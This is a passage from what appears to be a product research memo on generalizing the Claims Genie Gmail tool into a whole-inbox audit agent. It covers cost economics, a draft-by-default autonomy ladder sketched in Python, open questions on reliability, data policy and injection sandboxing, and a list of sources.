Claims Genie is not a separate product from this thesis — it is the first task type in the audit. It already does the hard 80%: read-only Gmail OAuth, recall-biased inbox scanning, Haiku-class classification at scale, structured extraction into a per-settlement profile, a file-based per-user work queue, and a pricing model (pay only after the user is paid) that is only viable because the scan cost is negligible. The settlement is one ★ recovery task. The inbox-agent system plan is the generalization Joe has already scoped: data/users/<id>/auto-file/ becomes data/users/<id>/tasks/<id>/, and file-settlement becomes one kind among cancel-subscription, refund-hunt, flight-comp, find-old-401k, collect-tax-docs, deadline-watch.
Three things this research firms up about that plan:
- The framing is validated, not speculative. "Inbox as event stream + system of record" is the synthesis the academic literature circled for 80 years without naming. Joe arrived at it independently. That is a good sign it is real.
- The unit economics are the moat, and they are timing-sensitive. The reason no incumbent does the whole-inbox audit is that the products were built when per-email reasoning was expensive, so each could justify only one vein. The window to be the cross-category auditor is open because of the price collapse — and the same collapse means a competitor can enter on the same economics. Speed matters.
- The autonomy ladder is forced by the reliability ceiling. 81.2% Q&A accuracy and benchmark agents emailing the wrong person mean the plan's observe → draft → auto ladder is not conservatism for its own sake; it is the correct response to a measured error rate. Default to draft. Reserve auto for tasks that are both reversible and verifiable. Treat the inbox as evidence to propose from, never as ground truth to act on unreviewed, and put a provenance + staleness flag on every extracted fact, because the data source guarantees some of them are wrong.
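The ladder rule in the last bullet is small enough to state as code. The sketch below is one reading of it, not the plan's implementation. The `reversible` and `verifiable` tests come from the text. The `evidence_is_fresh` and `actions_enabled` parameters are assumptions added here to show where a staleness flag and a user opt-in could plug in.

```python
from enum import Enum


class Rung(Enum):
    OBSERVE = "observe"
    DRAFT = "draft"
    AUTO = "auto"


def choose_rung(
    reversible: bool,
    verifiable: bool,
    evidence_is_fresh: bool = True,  # assumption: stale facts never justify auto
    actions_enabled: bool = True,    # assumption: user has opted in beyond read-only reporting
) -> Rung:
    """Highest rung a task may run at: draft by default, auto only when every gate passes."""
    if not actions_enabled:
        return Rung.OBSERVE
    if reversible and verifiable and evidence_is_fresh:
        return Rung.AUTO
    return Rung.DRAFT


# A reversible, verifiable task may run unattended; anything else is drafted for review.
print(choose_rung(reversible=True, verifiable=True).value)
print(choose_rung(reversible=False, verifiable=True).value)
print(choose_rung(reversible=True, verifiable=True, evidence_is_fresh=False).value)
```

Which task kinds count as reversible or verifiable is left open on purpose. That classification is the per-kind decision the article lists as an open question.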
Open questions
- Per-user economics at scale. $5–$15 of inference per full-life audit is the classification cost. The agentic web steps (logging into a retailer to claim a refund, navigating an escheatment portal) are Claude-on-Stagehand sessions that cost meaningfully more and can fail. What is the true blended cost per completed task, and which task kinds clear a performance-pricing bar?
- The reliability gate. 81.2% accuracy is fine for "here are subscriptions worth reviewing" and unacceptable for "we auto-cancelled this." Where exactly does each task kind sit on the observe/draft/auto ladder, and what is the verification step for each?
- Provider-policy exposure. Generalizing from settlement-filing to a broad inbox audit stores more structured personal data for more purposes. Does that stay inside Google's "only the feature the user authorized" Limited Use boundary, or does the consent surface and scope story need to be rebuilt before this ships? (This is the security/Gmail-OAuth blast-radius zone the Claims Genie CLAUDE.md flags as needing real review.)
- Where injection actually bites. Claims Genie's read-only scope plus local-model digest closes most paths. But the moment an agentic step has a browser and a login, the trifecta is complete. What is the sandbox boundary for the Stagehand sessions?
- The multi-inbox blind spot. One Gmail is a partial view. Is single-inbox coverage good enough for v1, and how is the user told what the agent cannot see?
- Does the user want the whole audit, or is it uncanny? A scan that returns "here are your 30 subscriptions, your orphaned 401(k), and the lab result you never followed up on" is enormously valuable and also slightly unsettling. The Duolingo-style, one-thing-at-a-time, celebrate-every-win UX philosophy in the Claims Genie product guide is probably the answer — surface the audit as a stream of small wins, not a single wall-of-truth report — but that is a design hypothesis to test, not a settled answer.
Sources
Prior art: Bush, "As We May Think" (The Atlantic, 1945); Freeman & Gelernter, "Lifestreams: A Storage Model for Personal Data" (ACM SIGMOD Record 25:1, 1996); Gemmell, Bell & Lueder, "MyLifeBits: A Personal Database for Everything" (CACM 49:1, 2006); Bell & Gemmell, Total Recall (Dutton, 2009); Dumais et al., "Stuff I've Seen" (SIGIR 2003); Whittaker & Sidner, "Email Overload" (CHI 1996); Bellotti et al., "Taking Email to Task" (CHI 2003); Whittaker, Bellotti & Gwizdka, "Email in Personal Information Management" (CACM 49:1, 2006); Jones, Keeping Found Things Found (Morgan Kaufmann, 2007); Bergman & Whittaker, The Science of Managing Our Digital Stuff (MIT Press, 2016); Sellen & Whittaker, "Beyond Total Capture" (CACM 53:5, 2010).
LLM-on-email & benchmarks: Shortwave engineering blog; OpenAI × Superhuman; Google "Gmail enters the Gemini era"; EnronQA (arXiv:2505.00263); WorkBench (arXiv:2405.00823); Simon Willison, "LLM schemas" (2025) and the lethal-trifecta / dual-LLM essays.
Economics: Epoch AI LLM inference price trends; a16z "LLMflation"; Anthropic + IntuitionLabs 2025–2026 API pricing.
Statistics: NAUPA / state unclaimed-property data; class-action claim-rate studies (Duke Judicature); Self Financial and ReSubs subscription studies; Money on FSA forfeiture; CNN on unredeemed gift cards; Consumer Reports / CPSC on recall awareness; HIPAA Journal / CNBC on 2025 data breaches.
Risk: Willison, "The lethal trifecta" (2025) and "The Dual LLM pattern" (2023); CVE-2024-5184 (EmailGPT); Mozilla 0din Gemini/Gmail phishing disclosure; CVE-2025-32711 (EchoLeak, Aim Labs); Noma Security GeminiJack; DeepMind CaMeL (arXiv:2503.18813) and "Lessons from Defending Gemini" (arXiv:2505.14534); Google API Services User Data Policy & 2023 Workspace generative-AI policy update; UK NCSC data-aggregation principles. See also the companion article data-sovereign-email.md in this repo.